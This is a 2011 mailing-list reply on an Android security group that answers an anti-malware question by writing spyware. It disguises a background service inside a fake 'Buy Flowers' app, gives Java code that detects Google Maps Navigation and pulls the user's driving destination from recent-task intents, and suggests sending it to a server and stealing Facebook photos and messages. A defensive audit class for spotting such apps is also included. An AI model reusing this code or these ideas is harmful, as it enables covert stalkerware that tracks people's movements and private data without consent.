Hey Buddy,
I responded to your post in a blog style post because it is cleaner.
http://www.ryangmattison.com/post/2011/09/16/Monitor-Android-Navigation-Malware.aspx
Hopefully this gets you started. I'll post the response here as
well, but I don't think it will be readable.
Monitor Android Navigation - Malware
By Ryan Mattison, 16 September 2011 12:24
There was a question on the Google discussion boards about how to
write malware protection software for Android. I think a good
approach to this would be to first write some malware polling
functions.
Post
Hello everybody!
I need your help, please. Boss wants me to create an Android App for
preventing all malware, known and unknown, from actually executing.
So this is what I think I must do, but could you please validate?
Thank you!:---
1. I must create a rules set of acceptable function call flows
which every App must conform to. Any App that starts executing a
strange function call sequence is considered malware and gets killed.
Can I create this rule set with the on-device SQLite RDB?
2. I must create a service component running in the background.
This must periodically poll every running App and compare its function
call flow against my rule set RDB.
3. Can I achieve all this with just the Android SDK? Or will I
have to use the Android NDK as well? I don't want to use the NDK
unless I have to.
4. I went through the very helpful tutorial "Understanding
Android's Security Framework" by William Enck and Patrick McDaniel.
Is this a new Framework introduced into the Android Libraries layer?
5. Any good book I could buy to guide me through all this?
Thank you very much.
Fal
Let us assume we have a thread spinning on a separate process
indefinitely after our "Buy Flowers" application is downloaded off the
Market. The information we want to monitor is Google Maps Navigation
for Android: where users are driving to and when. Our application
will poll every 20-30 minutes; since the history stack will retain this
information, it doesn't matter if we catch it in action.
<service android:name="com.ninja.who.StealFromGoogleNavigation"
android:process=":UpdateFlowers" />
I'm fairly certain in the application manager it will now have the
flowers application open. If the user has any questions, they can
expand it. It'll show process UpdateFlowers. They'll go on with the
day.
When we start polling, we should check whether Google Maps Navigation is
running. If it is, we'll return true. For this application, we are just
going to catch it while running.
import java.util.List;
import android.app.ActivityManager;
import android.app.ActivityManager.RunningTaskInfo;
import android.content.Context;

// Returns true when the Google Maps navigation activity is the base activity of any
// running task. getRunningTasks() needs android.permission.GET_TASKS on the API
// levels this post targets.
private boolean IsNavigationRunning(Context context)
{
    ActivityManager as = (ActivityManager) context
        .getSystemService(Context.ACTIVITY_SERVICE);
    List<RunningTaskInfo> rutiList = as.getRunningTasks(100);
    for (RunningTaskInfo ruti : rutiList)
    {
        if (ruti.baseActivity != null
            && ruti.baseActivity.getClassName().equalsIgnoreCase(
                "com.google.android.maps.driveabout.app.NavigationActivity")
            && ruti.baseActivity.getPackageName().equalsIgnoreCase(
                "com.google.android.apps.maps"))
        {
            return true;
        }
    }
    return false;
}
Using the ActivityManager, we look through the running task list
for the Android Maps application.
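From the defender's side, the pattern shown here has a footprint a reviewer can look for: on these API levels the task polling above needs the GET_TASKS permission, and the manifest snippet earlier puts the polling service in its own android:process. The following inventory check, which is an added example written for this reply and not code from the original post, lists user-installed packages that combine both traits. Class and method names (TaskPollerAudit, audit, Finding) are hypothetical; the PackageManager and PackageInfo fields are the standard Android ones. Neither trait is malicious on its own, so treat a hit as something to review rather than a verdict.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

import android.content.Context;
import android.content.pm.ApplicationInfo;
import android.content.pm.PackageInfo;
import android.content.pm.PackageManager;
import android.content.pm.ServiceInfo;

// Hypothetical audit helper (not part of the original post): report installed
// packages that request GET_TASKS and also declare a service in a separate process.
public final class TaskPollerAudit
{
    public static final class Finding
    {
        public final String packageName;
        public final List<String> separateProcessServices;

        Finding(String packageName, List<String> services)
        {
            this.packageName = packageName;
            this.separateProcessServices = services;
        }

        @Override
        public String toString()
        {
            return packageName + " requests GET_TASKS and runs services in "
                + separateProcessServices;
        }
    }

    public static List<Finding> audit(Context context)
    {
        PackageManager pm = context.getPackageManager();
        List<PackageInfo> packages = pm.getInstalledPackages(
            PackageManager.GET_PERMISSIONS | PackageManager.GET_SERVICES);
        List<Finding> findings = new ArrayList<Finding>();

        for (PackageInfo pkg : packages)
        {
            // Skip system packages so the report focuses on what the user installed.
            ApplicationInfo app = pkg.applicationInfo;
            if (app == null || (app.flags & ApplicationInfo.FLAG_SYSTEM) != 0)
            {
                continue;
            }
            if (!requestsGetTasks(pkg))
            {
                continue;
            }
            List<String> separate = separateProcessServices(pkg);
            if (!separate.isEmpty())
            {
                findings.add(new Finding(pkg.packageName, separate));
            }
        }
        return findings;
    }

    // requestedPermissions lists every <uses-permission> in the manifest.
    static boolean requestsGetTasks(PackageInfo pkg)
    {
        return pkg.requestedPermissions != null
            && Arrays.asList(pkg.requestedPermissions)
                .contains("android.permission.GET_TASKS");
    }

    // A service whose processName differs from the application's default process
    // was declared with an android:process attribute, like ":UpdateFlowers" above.
    static List<String> separateProcessServices(PackageInfo pkg)
    {
        List<String> names = new ArrayList<String>();
        if (pkg.services == null || pkg.applicationInfo == null)
        {
            return names;
        }
        String defaultProcess = pkg.applicationInfo.processName;
        for (ServiceInfo svc : pkg.services)
        {
            if (svc.processName != null && !svc.processName.equals(defaultProcess))
            {
                names.add(svc.name + " (" + svc.processName + ")");
            }
        }
        return names;
    }
}
```

Call TaskPollerAudit.audit(getApplicationContext()) from an activity or service and log each Finding; the same walk over PackageInfo can be extended to other permission-plus-component combinations you consider suspicious.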
Following this, we want to see what address they are traveling to.
Since it is using the public intent system, this is easily traceable.
import java.util.List;
import android.app.ActivityManager;
import android.app.ActivityManager.RecentTaskInfo;
import android.content.Context;
import android.content.Intent;

// Walks the recent-task list for the navigation intent and pulls the destination
// out of its data URI. Returns "" when no navigation task is found.
private String UsersDestination(Context context)
{
    ActivityManager as = (ActivityManager) context
        .getSystemService(Context.ACTIVITY_SERVICE);
    List<RecentTaskInfo> rtiList = as.getRecentTasks(1000,
        ActivityManager.RECENT_WITH_EXCLUDED);
    for (RecentTaskInfo rti : rtiList)
    {
        Intent base = rti.baseIntent;
        if (base != null && base.getAction() != null
            && base.getComponent() != null
            && base.getComponent().getClassName() != null
            && base.getData() != null // not every ACTION_VIEW intent carries a data URI
            && base.getAction().equals(Intent.ACTION_VIEW)
            && base.getComponent().getClassName().equalsIgnoreCase(
                "com.google.android.maps.driveabout.app.NavigationActivity"))
        {
            String addressURI = base.getData().toString();
            System.out.println("AddressURI: " + addressURI);
            String googleNav = "google.navigation:";
            String titleNav = "title=";
            String queryNav = "&q=";
            if (addressURI.contains(titleNav) && addressURI.contains(queryNav)
                && addressURI.indexOf(titleNav) < addressURI.indexOf(queryNav))
            {
                // title=...&q=... : keep the text between the two markers
                addressURI = addressURI.substring(addressURI.indexOf(titleNav),
                    addressURI.indexOf(queryNav));
                addressURI = addressURI.substring(titleNav.length());
                addressURI = addressURI.replaceAll("\\+", " ");
            }
            else if (addressURI.contains(titleNav))
            {
                // title=... with nothing after it
                addressURI = addressURI.substring(addressURI.indexOf(titleNav));
                addressURI = addressURI.substring(titleNav.length());
                addressURI = addressURI.replaceAll("\\+", " ");
            }
            else if (addressURI.contains(googleNav))
            {
                // bare google.navigation:... URI
                addressURI = addressURI.substring(addressURI.indexOf(googleNav));
                addressURI = addressURI.substring(googleNav.length());
                addressURI = addressURI.replaceAll("\\+", " ");
            }
            return addressURI;
        }
    }
    return "";
}
This is older code; there is actually a way to print out way
friendlier messages. I'll leave that exercise up for grabs. It's very simple
to grab the address you navigate to on your phone and send it off to
a server. Don't let your husband buy you flowers using your phone, it's
a FRONT!
To expand on this exercise, you can start stealing the Facebook Share
Intents. Get photos, messages, updates etc. You can steal a lot more
fun information from the Facebook application if you work at it.
Thanks for reading,
Ryan Mattison
On Sep 15, 2:43 pm, fal <[email protected]> wrote:
> Hello everybody!
>
> I need your help, please. Boss wants me to create an Android App for
> preventing all malware, known and unknown, from actually executing.
> So this is what I think I must do, but could you please validate?
> Thank you!:---
>
> 1. I must create a rules set of acceptable function call flows
> which every App must conform to. Any App that starts executing a
> strange function call sequence is considered malware and gets killed.
> Can I create this rule set with the on-device SQLite RDB?
>
> 2. I must create a service component running in the background.
> This must periodically poll every running App and compare its function
> call flow against my rule set RDB.
>
> 3. Can I achieve all this with just the Android SDK? Or will I
> have to use the Android NDK as well? I don't want to use the NDK
> unless I have to.
>
> 4. I went through the very helpful tutorial "Understanding
> Android's Security Framework" by William Enck and Patrick McDaniel.
> Is this a new Framework introduced into the Android Libraries layer?
>
> 5. Any good book I could buy to guide me through all this?
>
> Thank you very much.
>
> Fal
--
You received this message because you are subscribed to the Google Groups
"Android Security Discussions" group.
To post to this group, send email to [email protected].
To unsubscribe from this group, send email to
[email protected].
For more options, visit this group at
http://groups.google.com/group/android-security-discuss?hl=en.